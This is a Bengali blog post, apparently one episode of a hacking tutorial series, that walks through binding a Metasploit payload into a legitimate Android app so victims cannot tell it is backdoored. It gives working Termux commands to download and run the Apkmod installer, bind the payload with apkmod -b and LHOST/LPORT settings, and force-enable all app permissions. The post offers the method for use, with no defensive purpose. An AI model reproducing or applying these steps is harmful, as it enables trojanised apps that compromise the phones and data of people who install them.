গত পর্বে আমি virus or payload কিভাবে বানানো যায় কিভাবে সেটা port forwarding করতে হয় সেটা বলেছি । আজ আপনাদের সামনে নিয়ে আসলাম কিভাবে official app or যে কোন অ্যাপস ভিতর কিভাবে virus or payload bind করবেন। কেউ বুঝতেই পারবে না যে এইটা অ্যাপসটার মধ্যে virus or payload bind করা আছে। তো বেশি কথা না বলে কাজে চলে যাই।
অবশ্যই আপনার ফোনে metasploit ইনস্টল থাকতে হবে।
প্রথমে আমরা pkg update -y লিখে ইন্টার করবো।
এখন আমরা রান করবো pkg upgrade -y লিখে ইন্টার করবো।
এখন আমরা wget টা ইনস্টল করবো তার জন্য কমান্ড হচ্ছে pkg install wget লিখি ইন্টার করবো।
এখন আমরা মেইন টুলসটা ইনস্টল করবো। তার জন্য আমাদের কমান্ড হচ্ছে।
wget https://raw.githubusercontent.com/Hax4us/Apkmod/master/setup.sh
লিখে ইন্টার করবো।
এখন আমরা ls দিবো।
আর হ্যাঁ setup.sh কে পারমিশন দিতে হবে। আমি ও ss দিতে ভুলে গেছিলাম। পারমিশন দেওয়ার জন্য কমান্ড হচ্ছে । chmod 777 setup.sh লিখে ইন্টার দিয়ে আবার ls করবেন। যদি setup গ্রীন কালার হয় তাহলে বুঝবেন পারমিশন হয়েছে।
এখন আমরা setup.sh টুলস টা রান করবো। তার জন্য আপনার কিছু MB প্রয়োজন হবে ১৭০/২০০ মতো এবং কিছু সময় ও প্রয়োজন হবে ইনস্টল হতে। আর হ্যাঁ ইনস্টল করার আগে অবশ্যই আপনার metasploit টা ইনস্টল থাকতে হবে।
ইনস্টল হওয়ার পর আমরা apkmod লিখে ইন্টার করবো।
যদি সঠিক ভাবে ইনস্টল হয় তাহলে এই রকম দেখতে পারবো।
এখন আমরা যেই অ্যাপস টির উপর virus or payload bind করবো সেই অ্যাপস টি ফোনের স্টোরেজ মেমোরিতে রেখে দিবো।এখন আমরা bind করার জন্য কমান্ড হচ্ছে।
apkmod -b -i /sdcard/s.apk -o /sdcard/ss.apk LHOST=127.0.0.1 LPORT=4444
এখানে -b মানে = binding payload
-i মানে =input file directory
S হচ্ছে আমার স্টোরেজে যেই অ্যাপসটি আছে তার নাম।
-o আউটপুট।
এখন আমরা ইন্টার দিবো।
সফল ভাবে bind হলে এই রকম দেখতে পারবো। যদি bind এ কোন সমস্যা হয় তাহলে কমেন্ট এ বলবেন । যদি আপনি একসাথে অটো সব পারমিশন access করতে চান তাহলে নিচের কমান্ড টি রান করে দিবে তাহলে আবার নতুন করে apk তেরি হবে।
apkmod –enable-perm -i /sdcard/ss.apk -o /sdcard/sss.apk এখন আমরা আবার দেখতে পাবো
দেখতে পাচ্ছেন আমার ss.apk নামে app চলে আচ্ছে কেউ বুঝতেই পারবে না যে এই অ্যাপস টায় payload bind করা আছে।
No comments:
Post a Comment